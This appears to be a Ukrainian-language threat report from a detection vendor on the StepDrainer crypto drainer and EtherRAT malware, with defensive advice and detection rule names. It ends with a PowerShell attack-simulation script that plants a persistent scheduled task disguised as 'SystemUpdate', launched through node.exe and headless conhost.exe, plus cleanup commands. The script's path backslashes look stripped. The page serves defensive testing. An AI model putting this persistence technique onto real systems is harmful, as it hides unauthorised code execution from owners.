Криптовідсоси як конвергентна загроза: погляди на нові гібридні екосистеми атак
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
У звіті пояснюється, як усталена інфраструктура кіберзлочинності все більше конвергується з операціями зливу криптовалют, що призводить до появи гібридних екосистем атак, які ставлять під загрозу як активи Web2, так і Web3. Зловмисники покладаються на відшліфовані фішингові сторінки, тематика яких пов’язана з інструментами штучного інтелекту або фінансовими послугами, щоб переконати жертв підключити свої гаманці, авторизувати транзакції токенів і несвідомо переносити кошти через декілька блокчейнів. Два продемонстровані приклади, StepDrainer і EtherRAT, показують, як ця модель охоплює як злив гаманців у браузері, так і шкідливе програмне забезпечення для Windows з функціональністю, що усвідомлює блокчейн. В результаті загроза тепер поширюється далеко за межі користувачів криптовалют і глибше проникає в основні корпоративні середовища.
Розслідування
Дослідники вивчили роботу StepDrainer, як службу за підпискою на шкідливе ПЗ, включаючи його інфраструктуру на PHP і JavaScript та використання Web3Modal для відображення переконливих запрошень підключення до гаманців. Також вони проаналізували шкідливе ПЗ EtherRAT для Windows, яке постачалося через троянізований інсталятор TFTP, зберігало стійкість через ключ реєстру Run і взаємодіяло з кінцевими точками Ethereum та Solana RPC. Під час розслідування команда виявила індикатори, такі як шкідливі домени, ключі реєстру та артефакти командного рядка, пов’язані з обома шляхами атаки.
Пом’якшення
Організації повинні заблокувати доступ до відомих шкідливих доменів, вимагати багатофакторної аутентифікації для розширень гаманців де це можливо, та контролювати системи на предмет підозрілих записів реєстру Run та неочікуваних процесів Node.js. Команди безпеки також повинні перевіряти трафік до публічних сервісів RPC блокчейну на предмет аномальної поведінки та регулярно переглядати розширення браузера на предмет ознак підробки або зловживання.
Відповідь
Якщо така активність виявлена, негайно ізолюйте уражений хост, видаліть шкідливий запис реєстру Run, завершіть несанкціоновані процеси Node.js та скасуйте всі дозволи токенів, наданих ураженими гаманцями. Слідчі повинні потім провести криміналістичний аналіз, щоб виявити будь-які додаткові завантаження або механізми стійкості, а також оновити списки дозволених або заблокованих для запобігання подальшої комунікації з визначеною інфраструктурою командування і контролю.
Потік атаки
Детекції
Можливі точки стійкості [ASEPs – Програмне забезпечення/Вулик NTUSER] (через подію реєстру)
Перегляд
Виконання NodeJS з нетипового розташування (через командний рядок)
Перегляд
Можливе перерахування антивірусного або міжмережевого програмного забезпечення (через створення процесу)
Перегляд
LOLBAS Conhost (через командний рядок)
Перегляд
Підозріле використання CURL (через командний рядок)
Перегляд
Можливі перевірки обходу (через Powershell)
Перегляд
Можлива спроба зловживання Publicnode Ethereum як каналу C2 (через dns-запит)
Перегляд
Можливе вивантаження / завантаження даних / C2 через сторонні сервіси / інструменти (через проксі)
Перегляд
Можливе вивантаження / завантаження даних / C2 через сторонні сервіси / інструменти (через dns)
Перегляд
Виявлення механізму стійкості EtherRAT з використанням conhost.exe в режимі без голови [Створення процесу в Windows]
Перегляд
Виконання команди EtherRAT через PowerShell для системної розвідки [Windows PowerShell]
Перегляд
Виконання симуляції
Попередня умова: Тест телеметрії та базової лінії перед польотом має пройти.
-
Опис атаки та команди
Зловмисник вже розмістив шкідливий файл JavaScript (
payload.js) на цілі. Щоб досягти стійкості, вони використовують встановленийnode.exeбінарний файл для запускуconhost.exeв режимі без голови, який потім завантажує JavaScript навантаження. Цей метод уникає видимих вікон консолі і зливається з нормальноюnodeвикористанням.- Скидання шкідливого навантаження (
payload.js) до тимчасового розташування. - Виконати
node.exeз командою, яка створюєconhost.exe --headlessз вказівкою на навантаження. - Створіть заплановану задачу яка виконує цю ж команду при запуску системи, забезпечуючи стійкість.
- Скидання шкідливого навантаження (
-
Скрипт регресійних тестів
# Імітація стійкості EtherRAT – PowerShell # ------------------------------------------------- # 1. Підготуй шкідливий JavaScript навантаження $payloadPath = "$env:TEMPpayload.js" @" // Мінімальний шкідливий JS – насправді він би завантажив імплантат EtherRAT const { exec } = require('child_process'); exec('calc.exe'); // Приклад побічного ефекту "@ | Set-Content -Encoding UTF8 $payloadPath # 2. Знайти node.exe (припускаємо, що він у PATH) $node = (Get-Command node.exe).Source if (-not $node) { Write-Error "node.exe не знайдено в PATH." exit 1 } # 3. Скласти командний рядок conhost $conhostCmd = "C:WindowsSystem32conhost.exe --headless `"$payloadPath`"" # 4. Запуск через node.exe (це створює відношення батько-дитина) $script = "require('child_process').exec(`"$conhostCmd`")" & $node -e $script # 5. НЕОБОВ’ЯЗКОВО: Створіть заплановану задачу для стійкості $taskName = "SystemUpdate" $action = New-ScheduledTaskAction -Execute $node -Argument "-e `"$script`"" $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -RunLevel Highest -Force -
Команди очищення
# Вилучення запланованого завдання Unregister-ScheduledTask -TaskName "SystemUpdate" -Confirm:$false # Видалити навантаження Remove-Item -Path "$env:TEMPpayload.js" -Force # Зупинити всі незавершені процеси conhost, створені тестом Get-Process conhost -ErrorAction SilentlyContinue | Where-Object { $_.Path -eq 'C:WindowsSystem32conhost.exe' -and $_.CommandLine -match '--headless' } | Stop-Process -Force